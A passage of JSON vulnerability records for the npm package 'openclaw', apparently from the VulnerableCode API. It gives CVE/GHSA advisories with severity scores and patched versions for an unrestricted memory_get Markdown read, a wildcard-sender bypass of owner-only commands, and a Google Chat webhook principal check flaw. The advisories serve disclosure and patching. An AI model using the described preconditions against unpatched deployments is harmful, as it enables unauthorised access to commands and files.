                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7ggg-pvrf-458v",
                    "reference_id": "GHSA-7ggg-pvrf-458v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7ggg-pvrf-458v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41391",
                "GHSA-7ggg-pvrf-458v"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a2wx-7b8h-c3h1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89810?format=api",
            "vulnerability_id": "VCID-a46u-tnbh-fyhs",
            "summary": "OpenClaw: QMD memory_get restricts reads to canonical or indexed memory paths\n## Summary\n\nThe QMD backend `memory_get` read path accepted arbitrary workspace Markdown paths that were inside the workspace but outside the canonical memory locations or indexed QMD result set.\n\n## Impact\n\nWhen the QMD backend was enabled, a caller with access to `memory_get` could read arbitrary `*.md` files under the configured workspace root, even when those files were not canonical memory files and had not been returned by QMD search. Severity remains low because exploitation requires access to the memory tool surface and is limited to workspace Markdown files, but it bypassed the intended memory-path policy.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` restricts QMD reads to canonical memory paths or previously indexed QMD workspace paths. Workspace containment alone is no longer sufficient.\n\nVerified in `v2026.4.15`:\n\n- `extensions/memory-core/src/memory/qmd-manager.ts` rejects non-default workspace Markdown paths unless they match an indexed QMD workspace read path.\n- `extensions/memory-core/src/memory/qmd-manager.test.ts` covers QMD session search-result reads and the read-path restriction behavior.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `37d5971db36491d5050efd42c333cbe0b98ed292` via PR #66026\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66026",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66026"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f934-5rqf-xx47",
                    "reference_id": "GHSA-f934-5rqf-xx47",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f934-5rqf-xx47"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.15",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"
                }
            ],
            "aliases": [
                "GHSA-f934-5rqf-xx47"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a46u-tnbh-fyhs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90199?format=api",
            "vulnerability_id": "VCID-a4jz-y9s4-zkfg",
            "summary": "OpenClaw: Owner-enforced commands could accept wildcard channel senders as command owners\n## Impact\n\nOpenClaw deployments before `2026.4.21` could treat a non-owner sender as authorized for owner-enforced slash commands when all of the following were true:\n\n- a channel plugin declared `commands.enforceOwnerForCommands: true`;\n- the channel accepted wildcard inbound senders with `allowFrom: [\"*\"]`;\n- no explicit `commands.ownerAllowFrom` was configured.\n\nIn that state, `src/auto-reply/command-auth.ts` reused the channel inbound wildcard as part of the command-owner decision. A sender who was not the owner could therefore pass the owner-command gate for commands such as `/send`, `/config`, or `/debug` on the affected channel.\n\nThe issue is limited to the command-owner authorization axis. It does not by itself grant owner-only tool access, host/sandbox access, or gateway administrator scope.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.20`\n- Patched version: `2026.4.21`\n\nThe latest public release, `2026.4.21`, contains the fix.\n\n## Patches\n\nThe fix requires a concrete owner identity or internal operator-admin scope when a plugin enforces owner-only commands. Wildcard channel `allowFrom` no longer implies wildcard command ownership.\n\nFix commits:\n\n- `2aa93d44a1b2c7058c371f261fda2b5d4de4a882` on `main`\n- `995febb7b1e811ff6a1df5b18c22de94103f4c9f` in the `2026.4.21` release line\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.21` or later. Before upgrading, avoid wildcard/open-DM sender policy on owner-enforced channels, or configure `commands.ownerAllowFrom` to the intended owner identities.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44991",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08975",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08973",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08993",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44991"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44991",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44991"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c28g-vh7m-fm7v",
                    "reference_id": "GHSA-c28g-vh7m-fm7v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c28g-vh7m-fm7v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/111520?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.21",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.21"
                }
            ],
            "aliases": [
                "CVE-2026-44991",
                "GHSA-c28g-vh7m-fm7v"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a4jz-y9s4-zkfg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91439?format=api",
            "vulnerability_id": "VCID-aja9-wzp2-kbcj",
            "summary": "OpenClaw: Google Chat app-url webhook auth accepted non-deployment add-on principals\n## Summary\nGoogle Chat app-url webhook verification accepted add-on principals outside the intended deployment binding.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/googlechat/src/auth.ts now requires expectedAddOnPrincipal matching for add-on principals and rejects unexpected issuers.\n- extensions/googlechat/src/monitor-webhook.ts passes the configured appPrincipal into auth verification for the shipped webhook path.\n\nOpenClaw thanks @ijxpwastaken for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35622",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22596",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22641",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22656",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35622"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
